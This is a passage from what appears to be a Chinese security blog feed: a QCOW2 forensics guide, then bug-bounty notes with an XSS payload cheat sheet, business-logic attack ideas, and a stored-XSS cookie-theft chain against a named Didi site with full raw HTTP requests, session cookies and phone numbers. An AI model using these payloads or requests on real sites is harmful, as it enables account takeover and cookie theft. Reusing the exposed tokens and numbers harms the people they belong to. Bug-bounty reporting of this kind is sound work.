&lt;li&gt;&lt;a href=&quot;#32-linux%E9%95%9C%E5%83%8F%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9&quot;&gt;3.2 Linux镜像密码修改&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#321-virt-customize%E5%B7%A5%E5%85%B7&quot;&gt;3.2.1 virt-customize工具&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#312-guestfish%E6%89%8B%E5%8A%A8%E4%BF%AE%E6%94%B9&quot;&gt;3.1.2 guestfish手动修改&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#33-qemu%E5%90%AF%E5%8A%A8%E9%95%9C%E5%83%8F&quot;&gt;3.3 qemu启动镜像&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;QCOW2取证分析环境构建&lt;/h1&gt;
&lt;p&gt;在日常工作中，难免遇到一些镜像分析工作，当我们采用人工分析时，需要的常见命令在本文中进行总结。&lt;/p&gt;
&lt;h2&gt;一、QCOW2简介&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;KVM&lt;/code&gt;虚拟化中使用的镜像格式通常为&lt;code&gt;RAW&lt;/code&gt;和&lt;code&gt;QCOW2&lt;/code&gt;两种格式，&lt;code&gt;QCOW2&lt;/code&gt;镜像格式是目前虚拟化中主流的镜像格式。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/libyal/libqcow/blob/main/documentation/QEMU%20Copy-On-Write%20file%20format.asciidoc&quot;&gt;原文&lt;/a&gt;QEMU copy-on-write format with a range of special features, including the ability to take multiple snapshots, smaller images on filesystems that don’t support sparse files, optional AES encryption, and optional zlib compression.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;QCOW(QEMU copy-on-write)镜像文件具有一系列特性, 包括多重快照(能够创建基于之前镜像的新镜像，速度更快)，体积更小(不支持稀疏特性，不会预先分配指定&lt;code&gt;Size&lt;/code&gt;的存储空间)，可选&lt;code&gt;AES&lt;/code&gt;加密方式，可选&lt;code&gt;zlib&lt;/code&gt;压缩方式等功能。&lt;/p&gt;
&lt;h2&gt;二、qemu-img的基本使用&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;创建 QCOW2 镜像文件&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img create -f qcow2 img.qcow2 4G
Formatting &apos;img.qcow2&apos;, fmt=qcow2 size=4294967296 encryption=off cluster_size=65536 lazy_refcounts=off
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;查看 QCOW2 镜像文件信息&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img info img.qcow2
image: img.qcow2
file format: qcow2
virtual size: 4.0G (4294967296 bytes)
disk size: 196K
cluster_size: 65536
Format specific information:
    compat: 1.1
    lazy refcounts: false
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;创建 QCOW2 的快照&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img snapshot -c snap img.qcow2
# 再次查看 QCOW2 镜像文件信息, 可以看见快照列表
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;删除 QCOW2 镜像文件的快照&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img snapshot -d snap img.qcow2
# 再次查看 QCOW2 镜像文件信息, 可以看见快照被删除
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;快照恢复&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img snapshot -a snap img.qcow2
# 以快照位置启动
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;QCOW2 镜像文件转换成 RAW 格式&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img convert img.qcow2 -O raw raw.img
# 转化为RAW格式
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;三、分析环境构建&lt;/h2&gt;
&lt;p&gt;大部分工具包含在&lt;a href=&quot;https://libguestfs.org/&quot;&gt;libguestfs&lt;/a&gt;库中，相应工具下载&lt;code&gt;release&lt;/code&gt;版本&lt;code&gt;guestfs-tools&lt;/code&gt;即可。&lt;/p&gt;
&lt;h3&gt;3.1 文件系统挂载&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;安装&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sudo apt-get install guestfs-tools
guestfs-tools is already the newest version (1.52.0-3).
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;挂载&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# 创建挂载点
$ mkdir -p /mnt/qcow2
# 只读模式
$ sudo guestmount -a /path/to/img.qcow2 -i --ro /mnt/qcow2
# 读写模式
$ sudo guestmount -a /path/to/img.qcow2 -i /mnt/qcow2
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;3.2 Linux镜像密码修改&lt;/h3&gt;
&lt;p&gt;当处于特殊情况无法获得Linux用户密码，启动镜像又无法登陆进系统时，就需要考虑通过修改镜像的方式强制更新密码。方法有很多，这里列举工具和手工两种方式&lt;/p&gt;
&lt;h4&gt;3.2.1 virt-customize工具&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;安装&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sudo apt-get install guestfs-tools
guestfs-tools is already the newest version (1.52.0-3).
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;修改root密码&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sudo virt-customize -a /path/to/img.qcow2 --root-password password:1234569
[   0.0] Examining the guest ...
[  15.0] Setting a random seed
[  15.3] Setting passwords
[  21.7] SELinux relabelling
[  21.9] Finishing off
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;3.1.2 guestfish手动修改&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;安装&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sudo apt-get install libguestfs-tools
libguestfs-tools is already the newest version (1:1.52.0-6.1).
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;生成随机密码&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ openssl passwd -1 123456
$1$YA53Va4U$F1w1stz83NO8ee4kCgtzQ1
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;进入文件系统&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sudo guestfish --rw -a /path/to/img.qcow2

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: ‘help’ for help on commands
    ‘man’ to read the manual
    ‘quit’ to quit the shell

&amp;gt;&amp;lt;fs&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;修改密码&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;lt;fs&amp;gt; run
100% ⟦▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒⟧ --:--
&amp;gt;&amp;lt;fs&amp;gt; list-filesystems 
/dev/sda1: unknown
/dev/sda2: ext4
&amp;gt;&amp;lt;fs&amp;gt; mount /dev/sda2 / # 选择文件系统挂载
&amp;gt;&amp;lt;fs&amp;gt; vi /etc/shadow # 修改root密码为openssl生成的随机密码
                     # 形如root:!!:19017:0:99999:7:::
                     # 改为root:$1$YA53Va4U$F1w1stz83NO8ee4kCgtzQ1:19017:0:99999:7:::
&amp;gt;&amp;lt;fs&amp;gt; quit
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;3.3 qemu启动镜像&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;qemu挂载文件系统&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# -hda: 镜像路径
# -m: 内存
# -net: 转发ssh端口到主机的40022
$ qemu-system-x86_64 -hda /path/to/img.qcow2 -m 8G -net nic -net user,hostfwd=tcp::40022-:22
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;qemu serial console登陆&lt;/p&gt;
&lt;p&gt;直接输入账号root和修改后的密码123456即可。&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;localhost login: root
password:
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;ssh登陆&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# 根据提示输入密码
$ ssh root@localhost -p40022
root@localhost&apos;s password:
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
</content:encoded></item><item><title>src漏洞挖掘之旅</title><link>https://picoorg.github.io/posts/src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B9%8B%E6%97%85/</link><guid isPermaLink="true">https://picoorg.github.io/posts/src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B9%8B%E6%97%85/</guid><pubDate>Mon, 03 Mar 2025 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;XXE&lt;/li&gt;
&lt;li&gt;XSS：存储、反射、dom、pdf/svg&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;# 基础利用
&amp;lt;svg/onload=alert(1)&amp;gt;
&amp;lt;img src=x onerror=alert(1)&amp;gt;
&amp;lt;a href=&quot;javascript:alert(1)&quot; &amp;gt;click me&amp;lt;/a&amp;gt;
&amp;lt;a href=&apos;data:text/html;base64,YWxlcnQoMSkK&apos;&amp;gt;click here&amp;lt;/a&amp;gt;
&amp;lt;iframe src=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#49;&amp;amp;#41;&amp;gt;

# 闭合环境
&apos;&quot;&amp;gt;&amp;lt;svg/onload=alert(1)//

&amp;lt;iframe src=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#49;&amp;amp;#41;&amp;gt;
&amp;lt;iframe src=&amp;amp;#x0006A&amp;amp;#x00061&amp;amp;#x00076&amp;amp;#x00061&amp;amp;#x00073&amp;amp;#x00063&amp;amp;#x00072&amp;amp;#x00069&amp;amp;#x00070&amp;amp;#x00074&amp;amp;#x0003A&amp;amp;#x00061&amp;amp;#x0006C&amp;amp;#x00065&amp;amp;#x00072&amp;amp;#x00074&amp;amp;#x00028&amp;amp;#x00031&amp;amp;#x00029&amp;gt;
&amp;lt;a href=&quot;data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==&quot;&amp;gt;test&amp;lt;/a&amp;gt;
&amp;lt;script src=//ffff.pw&amp;gt;
&amp;lt;script src=//01.x🅍.ht&amp;gt;

&amp;lt;script&amp;gt;/*
*/alert/*
*/(document/*
*/.cookie)/*
*/&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;CORS：&lt;/li&gt;
&lt;li&gt;CSRF：&lt;/li&gt;
&lt;li&gt;RCE：electron、log4shell、shiro、fastjson&lt;/li&gt;
&lt;li&gt;sql注入：
&lt;ul&gt;
&lt;li&gt;order by：if(1=1,1,sleep(1))&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;注册：&lt;/li&gt;
&lt;li&gt;登陆：&lt;/li&gt;
&lt;li&gt;越权：
&lt;ul&gt;
&lt;li&gt;不应该具备的权限：送餐超出配送&lt;/li&gt;
&lt;li&gt;权限控制被绕过：付费漫画免费看&lt;/li&gt;
&lt;li&gt;垂直越权特权提升：踢人，无限禁言&lt;/li&gt;
&lt;li&gt;水平越权：登陆，操作别人订单，修改资料，修改评价&lt;/li&gt;
&lt;li&gt;未授权&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;交易：
&lt;ul&gt;
&lt;li&gt;金额修改，0.01，0，小数，正负值（A为-1，B为2，总值为1）绕过综合校验&lt;/li&gt;
&lt;li&gt;下溢出，负数&lt;/li&gt;
&lt;li&gt;上溢出，单件x件数，1073741824&lt;/li&gt;
&lt;li&gt;金额取整，1.9999&lt;/li&gt;
&lt;li&gt;ID替换：订单，优惠券，礼物&lt;/li&gt;
&lt;li&gt;并发送礼物，抽奖&lt;/li&gt;
&lt;li&gt;取货时并发&lt;/li&gt;
&lt;li&gt;支付并发：钱包支付总数超过余额，并发转账&lt;/li&gt;
&lt;li&gt;替换订单：创建订单号如果订单状态可修改，先进到支付界面，然后将订单修改成更大的金额，然后支付提前进入的支付界面&lt;/li&gt;
&lt;li&gt;数量修改&lt;/li&gt;
&lt;li&gt;上架商品突破限制，例如数量，字数。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;营销：
&lt;ul&gt;
&lt;li&gt;转盘概率越权配置&lt;/li&gt;
&lt;li&gt;并发创建订单后支付：通过多设备、多账号扫码创建订单，获得首购/签约类交易订单，重复获得优惠&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;直播：
&lt;ul&gt;
&lt;li&gt;炸房：快速进出房间，无限发送点赞，发言刷屏，频繁申请取消操作&lt;/li&gt;
&lt;li&gt;修改弹幕图片&lt;/li&gt;
&lt;li&gt;越权&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;社交
&lt;ul&gt;
&lt;li&gt;强行举报（读取本地消息上传那种）&lt;/li&gt;
&lt;li&gt;强行加好友（一般尝试重发通过好友这条协议）&lt;/li&gt;
&lt;li&gt;自由修改号码（靓号类）&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;阿里云备案self xss - 未提交&lt;/h2&gt;
&lt;p&gt;https://beian.aliyun.com/?spm=5176.5176.0.0.6be05fac0eITp1
&lt;img src=&quot;image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;【白帽赏金赛】滴滴统一登录内部账号枚举 - 已提交&lt;/h2&gt;
&lt;p&gt;https://me.xiaojukeji.com/resetPwd.html&lt;/p&gt;
&lt;p&gt;通过字段username遍历，请求为：&lt;/p&gt;
&lt;p&gt;POST /password/resetBymsg HTTP/1.1
Host: me.xiaojukeji.com
Cookie: _OMGID=7acfde7c-9f31-4f6f-b6d7-6ba88aa9aa02
Content-Length: 85
Sec-Ch-Ua-Platform: &quot;macOS&quot;
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: &quot;Chromium&quot;;v=&quot;131&quot;, &quot;Not_A Brand&quot;;v=&quot;24&quot;
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: application/json, text/javascript, &lt;em&gt;/&lt;/em&gt;; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://me.xiaojukeji.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive&lt;/p&gt;
&lt;p&gt;newPw1=1qac%40WSV&amp;amp;newPw2=1qac%40WSV&amp;amp;code=000001&amp;amp;verificationCodeMode=3&amp;amp;username=lili&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;存在用户名返回
&lt;img src=&quot;image-1.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;不存在用户名返回
&lt;img src=&quot;image-2.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;【白帽赏金赛】小桔科技星海系统组合漏洞1-click用户Cookie盗用&lt;/h2&gt;
&lt;p&gt;1、受影响URL/APP/业务&lt;/p&gt;
&lt;p&gt;https://page-biz.xiaojukeji.com/xinghai-sale-car&lt;/p&gt;
&lt;p&gt;2、测试账号及测试时间&lt;/p&gt;
&lt;p&gt;18222332811
13391768520
2025-03-04&lt;/p&gt;
&lt;p&gt;3、漏洞证明&lt;/p&gt;
&lt;p&gt;第一步：登陆后任意注册企业，其中企业信息，只需关注companyName，companyCode，companyCorporation三个字段准确性，可以从公开信息查询，爱企查任意企业都可以用来注册&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-4.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;POST /xinghai-sale-car/req-proxy/xinghai-sale-car/dop/dmp/company/registerCompany HTTP/2
Host: page-biz.xiaojukeji.com
Cookie: user_phone=2811; user_phone.sig=jhrnQJXsg22IFQmbIeORn587uoI; user_uid=117674139898240416; user_uid.sig=KEVHbcQiWzWeanLlYDMvtbkxRkQ; env=prod; env.sig=vpXF4S7kFhH8JjmGk6oZDU0A5QY; passportTicket=EsanIsDsa2leCmce-oE9TOXTD_mLk3M6ZfDZqxIlxegkzDkOwkAMQNG7_NqK7BnPErf03IElLM0ggaii3B2JVK97K0MJ8qSTIgwjTBiJKKqlCiMTKgzfKQSHI8KJAOFMmLXa3PLc555c3apw_TcLsfJ5fd-XhWiqaptwI6y5aVMvLtwJrKeUck7dDOGxz09Ct18AAAD__w==; passportTicket.sig=Zml67OAFqTGweNdOXt9e9sKAtHA; phone=18222332811; phone.sig=ycTbfbUeZG94_bj1QSnznZFjx6A; uid=117674139898240416; uid.sig=dEK44hPfhc5NntEC2lYd6vbOh_s; _OMGID=a797a60a-7818-4e47-9236-8124517c6d4b; ticket=GL8leaoD2neopKaKEnsvqS0r8j3fYzeBasKsVczqQ8kkzDmOg1AMgOG7_LWFbL_F4Hb6ucMsZGlepESpEHePENXXfRtDScqkkyIMI00YTjZVV2EU8qCSFtV6WIkQRiP5-kb4IUH4JefuakvrWlv4EsI_WYWV3Hg93s-_lQxVtV24nJ323o7uSmKzu5fisxnC7WzvpO6fAAAA__8%3D; PASSPORT_TICKET=&quot;yDxNDHWJ_-mXdGYt1L_h0wvVhZKrwlYc8yir_w5NXLUkzDtuwzAQhsG7fPVC2H9JhdS26XOHPJTEDQ3YcCXo7oasbqrZGE5SJp8cY4iUMYKs7jpYSDdGJdWqNNfwMMZM8v6B8UmC8UVKTZL6stQ691iiGT-vbyU37tfH7Xslm7trN37P0d9aP8Y_EvWIKCW6hPF_zhfS92cAAAD__w==&quot;; _OMGID=a797a60a-7818-4e47-9236-8124517c6d4b; __hash__wa=20250304-0-dev-user-2d58a34c-f974-48c1-ba9c-a2aa91556e48; __hash__cache=2d58a34c-f974-48c1-ba9c-a2aa91556e48; user-fingerprint-water-mark=20250304-0-dev-user-2d58a34c-f974-48c1-ba9c-a2aa91556e48
Content-Length: 288
Sec-Ch-Ua-Platform: &quot;macOS&quot;
Wsgsig: dd05-glabdBPNK/e7XfBl3wDhwxVkN6pv0Gl+E1xULX+EuuK+ICo5Pk6ofrW8L0HjV3G/mXFqju/aK9k+jsAj1wDhxSlr4wclGGlJc1SlMbCfS3N66Xf1PkMogUs12s/nq7GnWcFZipOcNlx3sf5T95+wwwEU+ZjZcCx3FHStM0bIo+zJ3Xs9RhVuceRcNbUmV37miWTqjo5e1Aldjt6/HOGvzY2+Apnoc9av+pVhbFucYP35MhpZx9PubdvIIbVTU4g/VbMZn4507BSbZDLn2S4iO6YW31QPEfY2cMZrLn84Sz0MIso2QBExgdnMLc1uU7pXWDevW3hB8/EKWsVVL50/wTZnMHinFjY4cTSk3g40w7v660Q3RheRCas02C5lrN4SXDeuj3YLK9wMjbAm1wgjxTOnHIsmFjk6bYkhMDbpzoC22X+lPr6QFaG01tqnqo4rqtVvhw12+lq3hdYh1LKjwT/VN1WQFWw6B1Yi2C+CZ+4J6ni5QhBqCBy42CAhq7DsWcBujw12+kU3hdYh1LKjwT/VNHJp0f/BB1Un8C8GY+cN3gsbRhABF9RKHc1SQN8VWtaxiJwaIA/KjC1w1SpivTYU+HynFGUAGOr18DbKw8jM6GGLv9MmGry12b5hrNKWWj6VhQS9KAA3qj6rNPuhzYOt+6zwEtx+bMOm3bfgZ3N7Hsm1QrMogUo1MCMXrNpU##KAwFHv3ULAtCQXS0ooOMsHZgPBKJXCXM2EmSAcZSSpOrXJ69yStHok/7Kxv0AlBcFbXFYWIV67WfCzumr1Ejkg==
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: &quot;Chromium&quot;;v=&quot;131&quot;, &quot;Not_A Brand&quot;;v=&quot;24&quot;
Current-Path: https://page-biz.xiaojukeji.com/xinghai-sale-car#/register
Caller: xinghai
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: application/json
Content-Type: application/json
Origin: https://page-biz.xiaojukeji.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://page-biz.xiaojukeji.com/xinghai-sale-car
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{&quot;version&quot;:2,&quot;businessId&quot;:4,&quot;companyName&quot;:&quot;广西孔雀西南飞科技发展有限公司&quot;,&quot;companyCode&quot;:&quot;91450103MA5PCAWB50&quot;,&quot;companyCityId&quot;:1,&quot;companyCorporation&quot;:&quot;刘乾生&quot;,&quot;companyCorporationCertificateType&quot;:2,&quot;companyCorporationId&quot;:&quot;111111111111111111&quot;,&quot;registerPhone&quot;:&quot;18222332811&quot;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image-5.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;第二步：修改用户身份，把企业转让给其他任意手机号如13391768520，并插入XSS Payload，需要绕过WAF&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-3.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;POST /xinghai-sale-car/req-proxy/xinghai-sale-car/dop/dmp/merchant/user/manage/operate HTTP/2
Host: page-biz.xiaojukeji.com
Cookie: user_phone=2811; user_phone.sig=jhrnQJXsg22IFQmbIeORn587uoI; user_uid=117674139898240416; user_uid.sig=KEVHbcQiWzWeanLlYDMvtbkxRkQ; env=prod; env.sig=vpXF4S7kFhH8JjmGk6oZDU0A5QY; passportTicket=EsanIsDsa2leCmce-oE9TOXTD_mLk3M6ZfDZqxIlxegkzDkOwkAMQNG7_NqK7BnPErf03IElLM0ggaii3B2JVK97K0MJ8qSTIgwjTBiJKKqlCiMTKgzfKQSHI8KJAOFMmLXa3PLc555c3apw_TcLsfJ5fd-XhWiqaptwI6y5aVMvLtwJrKeUck7dDOGxz09Ct18AAAD__w==; passportTicket.sig=Zml67OAFqTGweNdOXt9e9sKAtHA; phone=18222332811; phone.sig=ycTbfbUeZG94_bj1QSnznZFjx6A; uid=117674139898240416; uid.sig=dEK44hPfhc5NntEC2lYd6vbOh_s; _OMGID=a797a60a-7818-4e47-9236-8124517c6d4b; __hash__wa=20250304-0-dev-user-b5ce60c0-e4c6-4ee0-9fe5-25bf82432f5b; __hash__cache=b5ce60c0-e4c6-4ee0-9fe5-25bf82432f5b; user-fingerprint-water-mark=20250304-0-dev-user-b5ce60c0-e4c6-4ee0-9fe5-25bf82432f5b; ticket=GL8leaoD2neopKaKEnsvqS0r8j3fYzeBasKsVczqQ8kkzDmOg1AMgOG7_LWFbL_F4Hb6ucMsZGlepESpEHePENXXfRtDScqkkyIMI00YTjZVV2EU8qCSFtV6WIkQRiP5-kb4IUH4JefuakvrWlv4EsI_WYWV3Hg93s-_lQxVtV24nJ323o7uSmKzu5fisxnC7WzvpO6fAAAA__8%3D;  _OMGID=a797a60a-7818-4e47-9236-8124517c6d4b; __hash__wa=20250304-0-dev-user-9cd108b3-8fe4-4c14-841e-f4c83478f977; __hash__cache=9cd108b3-8fe4-4c14-841e-f4c83478f977; user-fingerprint-water-mark=20250304-0-dev-user-9cd108b3-8fe4-4c14-841e-f4c83478f977
Content-Length: 279
Sec-Ch-Ua-Platform: &quot;macOS&quot;
Wsgsig: dd05-NwPU2kEEs9MLFyG9uoV+8/2LxHHuLzOWDBCSX4cTgjPcepGC70gXIVSfR6KiyrTSEBRyhDZVwWA6aucaZoVM8U1JOLxt+8LtgkGk/7GZCmSGg8oD5C8q6lZCPTXmvVTRdlRX/frXZDIHAy4H/NhG8UP+wI6p34EjBUGs/KfWAt6a983K70nk2E/Iy6jnyrlQAADyhgerpmBGaK3eOuYB5t9Wlwrp6+InNU85hyNpgkEr44nzHhon0BEdzS7noqZyfaghUiTvYG9HfKJBxNLt4F6NwYeRL8EVDk7/VyNYCfOGCzRd7n7/6/VCO1btpAPQak4hjDrWwmIL9pC0vyY56/E1w1LZL3BODEWnhyfvDDxMCpJg2f8tIqZEP64nueAzeVXUhbMswmL1a3XdYNhJ7V2Kx19xM7BwGEsn/77ygjOAc2uI3s+/JmF6PwnlvlUielzvmcFVnXqHE4K+j7r+7leNx1LZM+6/DUbYV7DPfcZcg87B700VHhIEOx0mvewxeens/trVnXqHAKK+j7r+7leNx19zL+FhCUbYV7zrgDVcezGF2gDoIA/Oo5NtQdOU8VzU/chrxfEDaJ+aYyVE8F2NvY5rL8alCE7jVYRrbmMGe8GE2f7qL/BgP6DmvVYZgFXt/DrYxWd7cJ40QpS2H//MzOFR1p1WDBDWXN8odfP9fz30J0JjI9hCw6cppVEXdFpr##8irxLZVHLdlcR0owTwMzvWGDvAPIQOJDJIjvFuvkg4e57Gc9zLw2Zo6kF1ighiQT/Sg5hkZpl25akL4r8r75VA==
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: &quot;Chromium&quot;;v=&quot;131&quot;, &quot;Not_A Brand&quot;;v=&quot;24&quot;
Current-Path: https://page-biz.xiaojukeji.com/xinghai-sale-car#/company/authManage/userManage
Caller: xinghai
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: application/json
Content-Type: application/json
Origin: https://page-biz.xiaojukeji.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://page-biz.xiaojukeji.com/xinghai-sale-car
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{&quot;version&quot;:2,&quot;businessId&quot;:4,&quot;id&quot;:234392,&quot;action&quot;:&quot;update_info&quot;,&quot;data&quot;:{&quot;name&quot;:&quot;&amp;lt;a onmouseover=alert(document.cookie)&amp;gt;123&amp;lt;/a&amp;gt;%0a&quot;,&quot;idNo&quot;:&quot;&amp;lt;a onmouseover=alert(1)&amp;gt;123&amp;lt;/a&amp;gt;%0a&quot;,&quot;phone&quot;:&quot;18222332811&quot;,&quot;email&quot;:&quot;&quot;,&quot;roleList&quot;:[200374],&quot;idNoPhoto&quot;:&quot;&quot;,&quot;authLetterPhoto&quot;:&quot;&quot;,&quot;cityIdList&quot;:[]}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image-6.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;第三步：受害者登陆企业后，查看日志cookie即被盗用。当然除了盗用cookie外，还可以用于钓鱼等利用。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-7.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;image-8.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;第四步：此时原账号即可重新注册新的企业，重复前三步骤覆盖更多用户&lt;/p&gt;
&lt;p&gt;4、修复方案&lt;/p&gt;
&lt;p&gt;修复以下风险即可&lt;/p&gt;
&lt;p&gt;第一步：存在企业注册无审核风险&lt;/p&gt;
&lt;p&gt;第二步：存在用户身份越权赋予风险、XSS漏洞风险、末尾%0a WAF绕过风险&lt;/p&gt;
&lt;p&gt;第三步：存在用户登陆态cookie passportTicket无httponly保护&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &quot;xiaojuchefu.com&quot;,
  &quot;didialift.com&quot;,
  &quot;juyanwenjuan.com&quot;,
  &quot;99app.com&quot;,
  &quot;99taxis.mobi&quot;,
  &quot;didichuxing.com&quot;,
